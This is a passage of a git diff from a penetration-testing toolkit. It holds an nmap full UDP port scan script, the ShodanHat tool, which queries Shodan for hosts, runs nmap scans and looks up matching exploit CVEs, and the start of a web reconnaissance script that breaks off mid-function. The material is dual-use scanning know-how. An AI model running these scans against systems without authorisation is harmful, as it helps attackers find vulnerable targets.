Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "Please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1 +else + echo "Please provide the target IP address or an IP range." +fi diff --git a/reconnaissance/shodan/shodanhat/LICENSE b/reconnaissance/shodan/shodanhat/LICENSE index 20ab041..036ba9e 100644 --- a/reconnaissance/shodan/shodanhat/LICENSE +++ b/reconnaissance/shodan/shodanhat/LICENSE @@ -1,21 +1,21 @@ -MIT License - -Copyright (c) 2017 HatBashBR - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. +MIT License + +Copyright (c) 2017 HatBashBR + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/reconnaissance/shodan/shodanhat/README.md b/reconnaissance/shodan/shodanhat/README.md index 59aa62d..8db211f 100644 --- a/reconnaissance/shodan/shodanhat/README.md +++ b/reconnaissance/shodan/shodanhat/README.md @@ -1,30 +1,30 @@ -# Dependencies -You need to install shodan with pip install shodan or easy_install shodan.
-You need to install python-nmap with pip install python-nmap.
-You need to set your API Key in the 'constantes.py' file. - -# Options --h, --help show this help message and exit
--i IP, --ip=IP info about one host
--l LIST, --list=LIST info about a list of hosts
--s SQ, --sq=SQ searchquery string
---nmap perform a nmap scan in the hosts
---setkey=SETKEY set your api key automatically
--r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
--o OUTPUT, --output=OUTPUT specify a output file

- -Nmap Options:
---sS TCP Syn Scan
---sT TCP Connect Scan
---sU UDP Scan - -# Usage -For One Host
-python shodanhat.py -i IP
-For a list of Hosts
-python shodanhat.py -l list.txt
-You can also set a searchquery to make a specific query with '-s' option! - -# ScreenShots -
+# Dependencies +You need to install shodan with pip install shodan or easy_install shodan.
+You need to install python-nmap with pip install python-nmap.
+You need to set your API Key in the 'constantes.py' file. + +# Options +-h, --help show this help message and exit
+-i IP, --ip=IP info about one host
+-l LIST, --list=LIST info about a list of hosts
+-s SQ, --sq=SQ searchquery string
+--nmap perform a nmap scan in the hosts
+--setkey=SETKEY set your api key automatically
+-r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
+-o OUTPUT, --output=OUTPUT specify a output file

+ +Nmap Options:
+--sS TCP Syn Scan
+--sT TCP Connect Scan
+--sU UDP Scan + +# Usage +For One Host
+python shodanhat.py -i IP
+For a list of Hosts
+python shodanhat.py -l list.txt
+You can also set a searchquery to make a specific query with '-s' option! + +# ScreenShots +
\ No newline at end of file diff --git a/reconnaissance/shodan/shodanhat/shodanhat.py b/reconnaissance/shodan/shodanhat/shodanhat.py index 29cdd0b..8de73a2 100644 --- a/reconnaissance/shodan/shodanhat/shodanhat.py +++ b/reconnaissance/shodan/shodanhat/shodanhat.py @@ -1,319 +1,319 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -import optparse, shodan, sys, nmap, urllib2, json, os -from constantes import * - -class colors: - GREEN = '\033[92m' - YELLOW = '\033[93m' - FAIL = '\033[91m' - END = '\033[0m' - -def banner(): - print colors.GREEN + "███████╗██╗ ██╗ ██████╗ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ████████╗" - print "██╔════╝██║ ██║██╔═══██╗██╔══██╗██╔══██╗████╗ ██║██║ ██║██╔══██╗╚══██╔══╝" - print "███████╗███████║██║ ██║██║ ██║███████║██╔██╗ ██║███████║███████║ ██║ " - print "╚════██║██╔══██║██║ ██║██║ ██║██╔══██║██║╚██╗██║██╔══██║██╔══██║ ██║ " - print "███████║██║ ██║╚██████╔╝██████╔╝██║ ██║██║ ╚████║██║ ██║██║ ██║ ██║ " - print "╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ " - print "" - print "Author: Everton a.k.a XGU4RD14N && Mateus a.k.a Dctor" - print "Members HatBashBR: Johnny a.k.a UrdSys, Evelyn a.k.a Alyosha, Geovane" - print "fb.com/hatbashbr" - print "github.com/hatbashbr" + colors.END - print colors.YELLOW + "[!] Legal Disclaimer: We aren't responsible for bad use of this tool!" + colors.END - print "" -banner() - -hosts = {} - -def ipRange(start_ip, end_ip): - start = list(map(int, start_ip.split("."))) - end = list(map(int, end_ip.split("."))) - temp = start - ip_range = [] - - ip_range.append(start_ip) - while temp != end: - start[3] += 1 - for i in (3, 2, 1): - if temp[i] == 256: - temp[i] = 0 - temp[i-1] += 1 - ip_range.append(".".join(map(str, temp))) - - return ip_range - -def saveExploits(ip, port, o): - if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": - o.write(" [-] No exploits could be found\n") - else: - query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) - query = query.replace(" ", "+") - url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) - xpls = json.load(url) - if xpls["total"] > 0: - o.write(" Possible Exploits:\n") - for i in xpls["matches"]: - if i.has_key("cve"): - for cve in i["cve"]: - o.write(" [+] CVE: %s\n"%cve) - elif i.has_key("_id"): - o.write(" [+] ID: %s\n"%i["_id"]) - else: - o.write(" [-] No exploits could be found\n") - -def searchExploits(ip, port): - if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": - print colors.FAIL + " [-] No exploits could be found" + colors.END - else: - query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) - query = query.replace(" ", "+") - url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) - xpls = json.load(url) - if xpls["total"] > 0: - print colors.GREEN +" Possible Exploits:" - for i in xpls["matches"]: - if i.has_key("cve"): - for cve in i["cve"]: - print " [+] CVE: %s"%cve - elif i.has_key("_id"): - print " [+] ID: %s"%i["_id"] - print colors.END, - else: - print colors.FAIL + " [-] No exploits could be found" + colors.END - -def saveInfo(host, o): - o.write("IP: %s\n"%host["ip_str"]) - o.write("Organization: %s\n"%host.get("org", "n/a")) - o.write("Operating System: %s\n"%host.get("os", "n/a")) - o.write("Latitude: %s\n"%host["latitude"]) - o.write("Longitude: %s\n"%host["longitude"]) - o.write("City: %s\n"%host["city"]) - o.write("Hostnames:\n") - if len(host["hostnames"]) == 0: - o.write(" [-] No hostnames\n") - else: - for i in host["hostnames"]: - o.write(" [+] %s\n"%str(i)) - if host.has_key('vulns'): - o.write("Vulnerabilities:\n") - for i in host["vulns"]: - o.write(" [+] %s\n"%str(i)) - - if options.nmap: - hosts[str(host["ip_str"])] = {} - ports = "" - for item in host["data"]: - if item == host["data"][-1]: - ports += str(item["port"]) - else: - ports += str(item["port"])+"," - args = options.scantype - nm.scan(str(host["ip_str"]), ports, arguments=args) - if str(host["ip_str"]) in nm.all_hosts(): - o.write("Ports:\n") - for port in nm[str(host["ip_str"])]["tcp"]: - hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] - o.write(" [+] %s\t%s %s %s\n"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"])) - saveExploits(host["ip_str"], port, o) - else: - o.write("Ports:\n") - for item in host["data"]: - print o.write(" [+] %s\n"%item["port"]) - else: - o.write("Ports:\n") - for item in host["data"]: - o.write(" [+] %s\n"%item["port"]) - -def printInfo(host): - print colors.GREEN + "IP: %s"%host["ip_str"] - print "Organization: %s"%host.get("org", "n/a") - print "Operating System: %s"%host.get("os", "n/a") - print "Latitude: %s"%host["latitude"] - print "Longitude: %s"%host["longitude"] - print "City: %s"%host["city"] - print "Hostnames:" - if len(host["hostnames"]) == 0: - print colors.FAIL + " [-] No hostnames" + colors.END + colors.GREEN - else: - for i in host["hostnames"]: - print " [+] " + i - if host.has_key('vulns'): - print "Vulnerabilities:" - for i in host["vulns"]: - print " [+] " +i - - if options.nmap: - hosts[str(host["ip_str"])] = {} - ports = "" - for item in host["data"]: - if item == host["data"][-1]: - ports += str(item["port"]) - else: - ports += str(item["port"])+"," - - args = options.scantype - nm.scan(str(host["ip_str"]), ports, arguments=args) - if str(host["ip_str"]) in nm.all_hosts(): - print "Ports: " - for port in nm[str(host["ip_str"])]["tcp"]: - hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] - print colors.GREEN + " [+] %s\t%s %s %s"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"]) + colors.END - searchExploits(host["ip_str"], port) - else: - print "Ports: " - for item in host["data"]: - print colors.GREEN + " [+] %s"%item["port"] + colors.END - else: - print "Ports: " - for item in host["data"]: - print colors.GREEN + " [+] %s"%item["port"] + colors.END - print colors.END, - - - -parser = optparse.OptionParser() -parser.add_option("-i", "--ip", dest="ip", help="info about one host", default="") -parser.add_option("-l", "--list", dest="list", help="info about a list of hosts", default="") -parser.add_option("-s", "--sq", dest="sq", help="searchquery string", default="") -parser.add_option("--nmap", dest="nmap", action="store_true", help="perform a nmap scan in the hosts") -parser.add_option("--setkey", dest="setkey", help="set your api key automatically", default="") -parser.add_option("-r", "--range", dest="range", help="scan a range of ips. ex: 192.168.1.1-192.168.1.255", default="") -parser.add_option("-o", "--output", dest="output", help="specify a output file", default="") -group = optparse.OptionGroup(parser, "Nmap Options") -group.add_option("--sS", dest="scantype", action="store_const", help="TCP Syn Scan", const="-sS") -group.add_option("--sT", dest="scantype", action="store_const", help="TCP Connect Scan", const="-sT") -group.add_option("--sU", dest="scantype", action="store_const", help="UDP Scan", const="-sU") -parser.add_option_group(group) -parser.set_defaults(scantype="-sT") -options, args = parser.parse_args() - -if options.setkey != "": - f = open("constantes.py", 'w') - f.write('SHODAN_API_KEY = "%s"'%options.setkey) - SHODAN_API_KEY = options.setkey - -if SHODAN_API_KEY == "": - print "You need to set the API Key in the file 'constantes.py' or with the '--setkey' option" - sys.exit() - -if options.ip != "" and options.list != "": - print "You can't use '-i' with '-l'!" - sys.exit() - -api = shodan.Shodan(SHODAN_API_KEY) -nm = nmap.PortScanner() - -if options.output != "": - if os.path.isfile(options.output): - try: - ans = str(raw_input(colors.FAIL + "[-] File already exists, if you continue it will erase all the content of the file. continue? (y/N): " + colors.END)) - if ans != "y" and ans != "Y": - print colors.GREEN + "[+] Exiting..." + colors.END - sys.exit() - except SyntaxError: - print colors.GREEN + "[+] Exiting..." + colors.END - sys.exit() - o = open(options.output, 'w') - -if options.ip != "": - if options.output != "": - try: - print colors.GREEN + "[+] Writing host's info to the file" + colors.END - host = api.host(options.ip) - saveInfo(host, o) - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - try: - host = api.host(options.ip) - printInfo(host) - except Exception as e: - print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END - print -elif options.list != "": - f = open(options.list) - if options.output != "": - print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END - for ip in f.readlines(): - try: - host = api.host(ip) - saveInfo(host, o) - o.write('\n') - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - for ip in f.readlines(): - try: - host = api.host(ip) - printInfo(host) - print - except Exception as e: - print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END - print -elif options.range != "": - first = options.range.split('-')[0] - second = options.range.split('-')[1] - - #Verify if is a valid range - if len(first.split('.')) != 4 or len(second.split('.')) != 4: - print "[-] Invalid range! see the help to use the --range option." - sys.exit() - - #Verify if is a valid IP - for i in first.split('.'): - if int(i) > 255: - print "[-] Invalid IP! see the help to use the --range option." - sys.exit() - - for i in second.split('.'): - if int(i) > 255: - print "[-] Invalid IP! see the help to use the --range option." - sys.exit() - - firstSplited = first.split('.') - secondSplited = second.split('.') - firstSum = int(firstSplited[0])+int(firstSplited[1])+int(firstSplited[2])+int(firstSplited[3]) - secondSum = int(secondSplited[0])+int(secondSplited[1])+int(secondSplited[2])+int(secondSplited[3]) - - if(firstSum >= secondSum): - print "[-] Invalid range! see the help to use the --range option." - sys.exit() - - iprange = ipRange(first, second) - - if options.output != "": - print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END - for ip in iprange: - try: - host = api.host(ip) - saveInfo(host, o) - o.write('\n') - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - for ip in iprange: - try: - host = api.host(ip) - printInfo(host) - print - except Exception as e: - print colors.FAIL + "[-] "+ str(ip) +"\n Error: "+str(e) + colors.END - print -if options.sq != "": - try: - result = api.search(options.sq) - if options.output != "": - print colors.GREEN + "[+] Writing query results to the file" + colors.END - o.write("##### IP's that match the query '%s' #####\n"%options.sq) - else: - print "##### IP's that match the query '%s' #####"%options.sq - for service in result['matches']: - if options.output != "": - o.write(service['ip_str']+"\n") - else: - print service['ip_str'] - except Exception as e: - print "Error: "+str(e) +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +import optparse, shodan, sys, nmap, urllib2, json, os +from constantes import * + +class colors: + GREEN = '\033[92m' + YELLOW = '\033[93m' + FAIL = '\033[91m' + END = '\033[0m' + +def banner(): + print colors.GREEN + "███████╗██╗ ██╗ ██████╗ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ████████╗" + print "██╔════╝██║ ██║██╔═══██╗██╔══██╗██╔══██╗████╗ ██║██║ ██║██╔══██╗╚══██╔══╝" + print "███████╗███████║██║ ██║██║ ██║███████║██╔██╗ ██║███████║███████║ ██║ " + print "╚════██║██╔══██║██║ ██║██║ ██║██╔══██║██║╚██╗██║██╔══██║██╔══██║ ██║ " + print "███████║██║ ██║╚██████╔╝██████╔╝██║ ██║██║ ╚████║██║ ██║██║ ██║ ██║ " + print "╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ " + print "" + print "Author: Everton a.k.a XGU4RD14N && Mateus a.k.a Dctor" + print "Members HatBashBR: Johnny a.k.a UrdSys, Evelyn a.k.a Alyosha, Geovane" + print "fb.com/hatbashbr" + print "github.com/hatbashbr" + colors.END + print colors.YELLOW + "[!] Legal Disclaimer: We aren't responsible for bad use of this tool!" + colors.END + print "" +banner() + +hosts = {} + +def ipRange(start_ip, end_ip): + start = list(map(int, start_ip.split("."))) + end = list(map(int, end_ip.split("."))) + temp = start + ip_range = [] + + ip_range.append(start_ip) + while temp != end: + start[3] += 1 + for i in (3, 2, 1): + if temp[i] == 256: + temp[i] = 0 + temp[i-1] += 1 + ip_range.append(".".join(map(str, temp))) + + return ip_range + +def saveExploits(ip, port, o): + if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": + o.write(" [-] No exploits could be found\n") + else: + query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) + query = query.replace(" ", "+") + url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) + xpls = json.load(url) + if xpls["total"] > 0: + o.write(" Possible Exploits:\n") + for i in xpls["matches"]: + if i.has_key("cve"): + for cve in i["cve"]: + o.write(" [+] CVE: %s\n"%cve) + elif i.has_key("_id"): + o.write(" [+] ID: %s\n"%i["_id"]) + else: + o.write(" [-] No exploits could be found\n") + +def searchExploits(ip, port): + if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": + print colors.FAIL + " [-] No exploits could be found" + colors.END + else: + query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) + query = query.replace(" ", "+") + url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) + xpls = json.load(url) + if xpls["total"] > 0: + print colors.GREEN +" Possible Exploits:" + for i in xpls["matches"]: + if i.has_key("cve"): + for cve in i["cve"]: + print " [+] CVE: %s"%cve + elif i.has_key("_id"): + print " [+] ID: %s"%i["_id"] + print colors.END, + else: + print colors.FAIL + " [-] No exploits could be found" + colors.END + +def saveInfo(host, o): + o.write("IP: %s\n"%host["ip_str"]) + o.write("Organization: %s\n"%host.get("org", "n/a")) + o.write("Operating System: %s\n"%host.get("os", "n/a")) + o.write("Latitude: %s\n"%host["latitude"]) + o.write("Longitude: %s\n"%host["longitude"]) + o.write("City: %s\n"%host["city"]) + o.write("Hostnames:\n") + if len(host["hostnames"]) == 0: + o.write(" [-] No hostnames\n") + else: + for i in host["hostnames"]: + o.write(" [+] %s\n"%str(i)) + if host.has_key('vulns'): + o.write("Vulnerabilities:\n") + for i in host["vulns"]: + o.write(" [+] %s\n"%str(i)) + + if options.nmap: + hosts[str(host["ip_str"])] = {} + ports = "" + for item in host["data"]: + if item == host["data"][-1]: + ports += str(item["port"]) + else: + ports += str(item["port"])+"," + args = options.scantype + nm.scan(str(host["ip_str"]), ports, arguments=args) + if str(host["ip_str"]) in nm.all_hosts(): + o.write("Ports:\n") + for port in nm[str(host["ip_str"])]["tcp"]: + hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] + o.write(" [+] %s\t%s %s %s\n"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"])) + saveExploits(host["ip_str"], port, o) + else: + o.write("Ports:\n") + for item in host["data"]: + print o.write(" [+] %s\n"%item["port"]) + else: + o.write("Ports:\n") + for item in host["data"]: + o.write(" [+] %s\n"%item["port"]) + +def printInfo(host): + print colors.GREEN + "IP: %s"%host["ip_str"] + print "Organization: %s"%host.get("org", "n/a") + print "Operating System: %s"%host.get("os", "n/a") + print "Latitude: %s"%host["latitude"] + print "Longitude: %s"%host["longitude"] + print "City: %s"%host["city"] + print "Hostnames:" + if len(host["hostnames"]) == 0: + print colors.FAIL + " [-] No hostnames" + colors.END + colors.GREEN + else: + for i in host["hostnames"]: + print " [+] " + i + if host.has_key('vulns'): + print "Vulnerabilities:" + for i in host["vulns"]: + print " [+] " +i + + if options.nmap: + hosts[str(host["ip_str"])] = {} + ports = "" + for item in host["data"]: + if item == host["data"][-1]: + ports += str(item["port"]) + else: + ports += str(item["port"])+"," + + args = options.scantype + nm.scan(str(host["ip_str"]), ports, arguments=args) + if str(host["ip_str"]) in nm.all_hosts(): + print "Ports: " + for port in nm[str(host["ip_str"])]["tcp"]: + hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] + print colors.GREEN + " [+] %s\t%s %s %s"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"]) + colors.END + searchExploits(host["ip_str"], port) + else: + print "Ports: " + for item in host["data"]: + print colors.GREEN + " [+] %s"%item["port"] + colors.END + else: + print "Ports: " + for item in host["data"]: + print colors.GREEN + " [+] %s"%item["port"] + colors.END + print colors.END, + + + +parser = optparse.OptionParser() +parser.add_option("-i", "--ip", dest="ip", help="info about one host", default="") +parser.add_option("-l", "--list", dest="list", help="info about a list of hosts", default="") +parser.add_option("-s", "--sq", dest="sq", help="searchquery string", default="") +parser.add_option("--nmap", dest="nmap", action="store_true", help="perform a nmap scan in the hosts") +parser.add_option("--setkey", dest="setkey", help="set your api key automatically", default="") +parser.add_option("-r", "--range", dest="range", help="scan a range of ips. ex: 192.168.1.1-192.168.1.255", default="") +parser.add_option("-o", "--output", dest="output", help="specify a output file", default="") +group = optparse.OptionGroup(parser, "Nmap Options") +group.add_option("--sS", dest="scantype", action="store_const", help="TCP Syn Scan", const="-sS") +group.add_option("--sT", dest="scantype", action="store_const", help="TCP Connect Scan", const="-sT") +group.add_option("--sU", dest="scantype", action="store_const", help="UDP Scan", const="-sU") +parser.add_option_group(group) +parser.set_defaults(scantype="-sT") +options, args = parser.parse_args() + +if options.setkey != "": + f = open("constantes.py", 'w') + f.write('SHODAN_API_KEY = "%s"'%options.setkey) + SHODAN_API_KEY = options.setkey + +if SHODAN_API_KEY == "": + print "You need to set the API Key in the file 'constantes.py' or with the '--setkey' option" + sys.exit() + +if options.ip != "" and options.list != "": + print "You can't use '-i' with '-l'!" + sys.exit() + +api = shodan.Shodan(SHODAN_API_KEY) +nm = nmap.PortScanner() + +if options.output != "": + if os.path.isfile(options.output): + try: + ans = str(raw_input(colors.FAIL + "[-] File already exists, if you continue it will erase all the content of the file. continue? (y/N): " + colors.END)) + if ans != "y" and ans != "Y": + print colors.GREEN + "[+] Exiting..." + colors.END + sys.exit() + except SyntaxError: + print colors.GREEN + "[+] Exiting..." + colors.END + sys.exit() + o = open(options.output, 'w') + +if options.ip != "": + if options.output != "": + try: + print colors.GREEN + "[+] Writing host's info to the file" + colors.END + host = api.host(options.ip) + saveInfo(host, o) + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + try: + host = api.host(options.ip) + printInfo(host) + except Exception as e: + print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END + print +elif options.list != "": + f = open(options.list) + if options.output != "": + print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END + for ip in f.readlines(): + try: + host = api.host(ip) + saveInfo(host, o) + o.write('\n') + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + for ip in f.readlines(): + try: + host = api.host(ip) + printInfo(host) + print + except Exception as e: + print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END + print +elif options.range != "": + first = options.range.split('-')[0] + second = options.range.split('-')[1] + + #Verify if is a valid range + if len(first.split('.')) != 4 or len(second.split('.')) != 4: + print "[-] Invalid range! see the help to use the --range option." + sys.exit() + + #Verify if is a valid IP + for i in first.split('.'): + if int(i) > 255: + print "[-] Invalid IP! see the help to use the --range option." + sys.exit() + + for i in second.split('.'): + if int(i) > 255: + print "[-] Invalid IP! see the help to use the --range option." + sys.exit() + + firstSplited = first.split('.') + secondSplited = second.split('.') + firstSum = int(firstSplited[0])+int(firstSplited[1])+int(firstSplited[2])+int(firstSplited[3]) + secondSum = int(secondSplited[0])+int(secondSplited[1])+int(secondSplited[2])+int(secondSplited[3]) + + if(firstSum >= secondSum): + print "[-] Invalid range! see the help to use the --range option." + sys.exit() + + iprange = ipRange(first, second) + + if options.output != "": + print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END + for ip in iprange: + try: + host = api.host(ip) + saveInfo(host, o) + o.write('\n') + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + for ip in iprange: + try: + host = api.host(ip) + printInfo(host) + print + except Exception as e: + print colors.FAIL + "[-] "+ str(ip) +"\n Error: "+str(e) + colors.END + print +if options.sq != "": + try: + result = api.search(options.sq) + if options.output != "": + print colors.GREEN + "[+] Writing query results to the file" + colors.END + o.write("##### IP's that match the query '%s' #####\n"%options.sq) + else: + print "##### IP's that match the query '%s' #####"%options.sq + for service in result['matches']: + if options.output != "": + o.write(service['ip_str']+"\n") + else: + print service['ip_str'] + except Exception as e: + print "Error: "+str(e) diff --git a/reconnaissance/web-reconnaissance.py b/reconnaissance/web-reconnaissance.py index 251f24a..bec5af3 100644 --- a/reconnaissance/web-reconnaissance.py +++ b/reconnaissance/web-reconnaissance.py @@ -1,403 +1,403 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-2018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.2" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import os -import requests -import socket -import ssl - -from bs4 import BeautifulSoup, Comment -from termcolor import colored -from argparse import RawTextHelpFormatter -from urlparse import urlparse - -################################ - -from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning - -################################ - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def magenta(text): - return colored(text, 'magenta', attrs=['bold']) - -def blue(text): - return colored(text, 'blue', attrs=['bold']) - -################################ - -message = """ - __ __ _ _____ - \ \ / / | | | __ \ - \ \ /\ / /__| |__ | |__) |___ ___ ___ _ __ - \ \/ \/ / _ \ '_ \| _ // _ \/ __/ _ \| '_ \ - \ /\ / __/ |_) | | \ \ __/ (_| (_) | | | | - \/ \/ \___|_.__/|_| \_\___|\___\___/|_| |_| - - Web Application Reconnaissance | @maldevel - {}: {} -""".format(blue('Version'), green(__version__)) - -########################### - -def parseArgs(): - parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) - parser.add_argument("-u", "--url", action="store", metavar='URL', dest='url', type=str, - default=None, required=True, - help='The url to scan, e.g. http://example.com, https://example.com, http://192.168.1.1') - parser.add_argument('-o', '--output', action='store', metavar='LOGFILE', dest='logs', type=str, default=None, - help='Log file path') - args = parser.parse_args() - - return args - -########################### - -def find_headers(url, logfile): - - print magenta('[+] Headers') - if logfile: - logfile.write('### Headers\n\n') - - try: - r = requests.head(url, verify=False) - except: - print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) - return False - - for key, value in r.headers.items() : - print '{} {}: {}'.format(green('>'), key, value) - if logfile: - logfile.write('* {}: {}\n'.format(key, value)) - - -def find_title(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] Title') - if logfile: - logfile.write('### Title\n\n') - - title = soup.find('title') - print '{} {}'.format(green('>'), title) - if logfile: - logfile.write('```\n{}\n```\n\n'.format(title)) - - -def find_meta(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] Meta tags') - if logfile: - logfile.write('### Meta tags\n\n') - - for tag in soup.find_all('meta'): - print '{} {}'.format(green('>'), tag) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(tag)) - - -def find_comments(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] HTML Comments') - if logfile: - logfile.write('### HTML Comments\n\n') - - for comment in soup.findAll(text=lambda text:isinstance(text, Comment)): - print '{} {}'.format(green('>'), comment) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(comment)) - -########################## - -def socket_request(hostname, request, port=80, https=False): - CRLF = "\r\n" - - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(5) - - if https: - s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) - - try: - s.connect((hostname, port)) - except: - print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) - return False - - s.send(CRLF.join(request)) - - response = b'' - - buffer = s.recv(4096) - while buffer: - response += buffer - buffer = s.recv(4096) - - header, _, body = response.partition(CRLF + CRLF) - s.close() - - return header - - -def malformed_request(url, logfile, port=80, https = False): - hostname = urlparse(url).hostname - - request1 = [ - "GET 